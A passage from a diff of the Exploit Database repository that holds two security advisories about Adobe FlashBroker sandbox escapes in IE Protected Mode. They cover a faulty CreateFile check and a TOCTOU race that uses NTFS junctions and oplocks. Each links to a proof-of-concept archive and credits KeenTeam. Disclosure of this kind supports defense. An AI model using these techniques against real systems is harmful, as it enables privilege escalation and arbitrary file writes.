FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.
There is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker uses CreateFile to open the destination folder for check. If CreateFile fails, the destination will be considered as a valid path. However, FlashBroker uses dwShareMode as 0 in CreateFile, which make CreateFile always fail if handle of the destination folder is held by other.
The PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.
2. Credit
Jietao Yang and Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37841.zip

16
platforms/windows/remote/37842.txt Executable file
View file

@ -0,0 +1,16 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=280&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
FlashBroker - BrokerMoveFileEx TOCTOU IE PM Sandbox Escape
1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker
FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.
There is a race condition in FlashBroker BrokerMoveFileEx method. This race can be won by using an oplock to wait for the point where the BrokerMoveFileEx method opens the original file and then making destination to be a junction.
The PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.
2. Credit
Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37842.zip